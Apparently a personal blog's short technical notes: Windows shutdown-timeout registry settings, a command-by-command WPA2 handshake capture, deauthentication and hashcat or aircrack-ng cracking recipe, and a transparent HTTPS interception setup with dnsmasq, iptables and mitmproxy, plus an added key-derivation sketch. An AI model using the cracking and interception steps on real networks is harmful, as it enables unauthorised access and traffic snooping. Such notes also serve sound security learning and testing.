All posts by RSR

Windows11 AutoEndTasks and kill timeout

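I thought I had shut down Windows, but one program did not terminate and the PC was observed to stay powered on.

I would like Windows to wait a set time and force-terminate the program if it does not respond.
For now I plan to check whether adding the registry values below solves it.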

It is possible to control how quickly Windows should automatically end applications.

Windows can detect that an application has frozen if it doesn't respond within a specific time, and then prompt the user:

[HKEY_CURRENT_USER\Control Panel\Desktop]
HungAppTimeout = "2500" (Default = 5000, Min = 1, Max = 65536)

Windows can be told to automatically close frozen applications without asking the user first:

[HKEY_CURRENT_USER\Control Panel\Desktop]
AutoEndTasks = "1" (Default = 0, Enable = 1, Disable = 0)

Windows can force-close applications at shutdown that don't close within a specific time:

[HKEY_CURRENT_USER\Control Panel\Desktop]
WaitToKillAppTimeout = "10000" (Default = 20000, Min = 1, Max = 65536)

Note: lowering the timeout values too much might lead to improper shutdown of applications, which might leave half-written, invalid, or faulty data that keeps the application from starting properly again.

https://smallvoid.com/article/windows-application-timeout.html

WPA2 Crack with hashcat

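With WPA2, one approach is to capture the packets carrying the salt and KDF2 value exchanged during authentication, and then run a brute-force (BF) or dictionary attack against them.

Put the WLAN interface into monitor mode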

airmon-ng start wlp4s0
airmon-ng check kill
rfkill list
rfkill unblock [dev_id]

Scan APs

airodump-ng -c 5 wlp4s0mo [--band a (for 5 GHz)]
airodump-ng --bssid [bssid] -c 6 --write packet wlp4s0mo

Send deauth packets

aireplay-ng --deauth 100 -a [Station] wlp4s0mo

Convert cap to hccapx (outdated way)

cap2hccapx.bin packet-01.cap out.hccapx

Convert cap to hc22000

hcxpcapngtool -o hash.hc22000 -E wordlist dumpfile.pcapng

Run hashcat

hashcat -m 2500 out.hccapx -a 3 ?d?d?d?d?d?d?d?d -w 3

hashcat -m 22000 hash.hc22000 wordlist.txt

or use aircrack-ng

$ aircrack-ng dumpfile.pcapng -w wordlist.txt
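
The key derivation behind the "salt and KDF2 value" above, as an added example that is not part of the original post: WPA2-PSK derives its pairwise master key with PBKDF2-HMAC-SHA1 using the SSID as the salt, and the sketch sizes the 8-digit mask from the hashcat line against a longer random passphrase. The guess rate is an assumed figure and the function names are hypothetical.

```python
import hashlib
import math

# IEEE 802.11i test vector: passphrase "password", SSID "IEEE".
IEEE_TEST_PMK = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"

# Assumption: offline PMK guesses per second; replace with your own estimate.
ASSUMED_GUESSES_PER_SECOND = 500_000


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 32 bytes)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("a WPA2 passphrase is 8 to 63 characters long")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def keyspace_bits(alphabet_size: int, length: int) -> float:
    """Entropy in bits of a passphrase drawn uniformly at random."""
    return length * math.log2(alphabet_size)


def worst_case_seconds(alphabet_size: int, length: int,
                       rate: int = ASSUMED_GUESSES_PER_SECOND) -> float:
    """Time to try every candidate at the assumed guess rate."""
    return alphabet_size ** length / rate


def report(label: str, alphabet_size: int, length: int) -> str:
    bits = keyspace_bits(alphabet_size, length)
    secs = worst_case_seconds(alphabet_size, length)
    return f"{label}: {bits:.1f} bits, {secs:.3g} s to exhaust"


if __name__ == "__main__":
    # The derivation matches the published vector.
    print(wpa2_pmk("password", "IEEE").hex() == IEEE_TEST_PMK)
    # Same passphrase, different SSID: the salt changes the PMK.
    print(wpa2_pmk("password", "IEEE") != wpa2_pmk("password", "IEEE-guest"))
    # The page's mask ?d?d?d?d?d?d?d?d versus a random 16-character passphrase.
    print(report("8 digits", 10, 8))
    print(report("16 chars from [A-Za-z0-9]", 62, 16))
```

Because the SSID is the salt, a unique network name invalidates tables precomputed for common SSIDs, but only passphrase entropy raises the cost of an offline search.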

HTTPS MITM with transparent mode

Set the IP address for the client-side adapter

Edit /etc/network/interfaces:

# Proxy Server network interface
auto eth1
iface eth1 inet static
address 192.168.3.1
netmask 255.255.255.0
gateway 0.0.0.0

Resolve the port 53 conflict

# vi /etc/systemd/resolved.conf   (set DNSStubListener=no)
# systemctl restart systemd-resolved

Configure dnsmasq

Then replace /etc/dnsmasq.conf with:

# Listen for DNS requests on the internal network
interface=eth1
# Act as a DHCP server, assign IP addresses to clients
dhcp-range=192.168.3.10,192.168.3.100,96h
# Broadcast gateway and dns server information
dhcp-option=option:router,192.168.3.1
dhcp-option=option:dns-server,192.168.3.1

# systemctl restart dnsmasq

Sysctls

sysctl -w net.ipv4.ip_forward=1
sysctl -w net.ipv6.conf.all.forwarding=1
sysctl -w net.ipv4.conf.all.send_redirects=0

Rerouting

iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 443 -j REDIRECT --to-port 8080

Start mitmproxy

$ mitmweb --mode transparent --showhost

https://docs.mitmproxy.org/stable/concepts-modes/#socks-proxy

https://docs.mitmproxy.org/stable/howto-transparent/

https://nickcharlton.net/posts/transparent-proxy-virtual-machines-mitmproxy.html